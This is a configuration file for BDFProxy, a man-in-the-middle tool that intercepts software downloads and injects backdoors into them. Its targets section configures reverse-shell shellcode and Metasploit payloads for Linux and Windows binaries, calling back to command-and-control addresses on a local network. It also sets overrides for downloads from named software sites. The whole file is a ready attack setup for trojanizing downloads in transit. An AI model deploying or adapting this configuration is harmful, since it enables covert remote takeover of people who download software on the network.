[Overall]
transparentProxy = True # Must for transparent proxy
MaxSizeFileRequested = 100000000 # will send a 502 request of large content to the client (server error)
certLocation = ~/.mitmproxy/mitmproxy-ca.pem
proxyPort = 8080
sslports = 443, 8443
loglevel = INFO
logname = proxy.log
resourceScript = bdfproxy_msf_resource.rc


[hosts]
#whitelist host/IP - patch these only. 
#ALL is everything, use the blacklist to leave certain hosts/IPs out

whitelist = ALL

#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.

blacklist = ,   # a comma is null do not leave blank


[keywords]
#These checks look at the path of a url for keywords

whitelist = ALL

#For blacklist note binaries that you do not want to touch at all

# Also applied in zip files

blacklist = Tcpview.exe, skype.exe, .dll


[ZIP]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files 
# and send on it's way

patchCount = 5

# In Bytes
maxSize = 40000000

blacklist = .dll,  #don't do dlls in a zip file

[targets]
	#MAKE SURE that your settings for host and port DO NOT
	# overlap between different types of payloads
	
	[[ALL]] # DEFAULT settings for all targets REQUIRED
	
	LinuxType = ALL 	# choices: x86/x64/ALL/None
	WindowsType = ALL 	# choices: x86/x64/ALL/None
	
	FileSizeMax = 50000000  # ~50 MB (just under) No patching of files this large

	CompressedFiles = True #True/False

		[[[LinuxIntelx86]]]
		SHELL = reverse_shell_tcp   # This is the BDF syntax
		HOST = 192.168.1.168 		# The C2
		PORT = 8888
		SUPPLIED_SHELLCODE = None
		MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax
		
		[[[LinuxIntelx64]]]
		SHELL = reverse_shell_tcp
		HOST = 192.168.1.16
		PORT = 9999
		SUPPLIED_SHELLCODE = None
		MSFPAYLOAD = linux/x64/shell_reverse_tcp

		[[[WindowsIntelx86]]]
		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
		HOST = 192.168.1.16
		PORT = 8443
		SHELL = loadliba_reverse_tcp 
		SUPPLIED_SHELLCODE = None
		ZERO_CERT = False
		PATCH_DLL = True
		MSFPAYLOAD = windows/shell_reverse_tcp

		[[[WindowsIntelx64]]]
		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
		HOST = 192.168.1.16
		PORT = 8088
		SHELL = reverse_shell_tcp
		SUPPLIED_SHELLCODE = None
		ZERO_CERT = True
		PATCH_DLL = False
		MSFPAYLOAD = windows/x64/shell_reverse_tcp

	# Call out the difference for targets here as they differ from ALL
	# These settings override the ALL settings
	
	[[sysinternals.com]]
	LinuxType = None
	WindowsType = x86
	CompressedFiles = False
	#inherits WindowsIntelx32 from ALL
		[[[WindowsIntelx86]]]
		PATCH_DLL = False
		ZERO_CERT = True

	[[sourceforge.org]]
	WindowsType = x64
	CompressedFiles = False

		[[[WindowsIntelx64]]]
		PATCH_DLL = False

		[[[WindowsIntelx86]]]
		PATCH_DLL = False
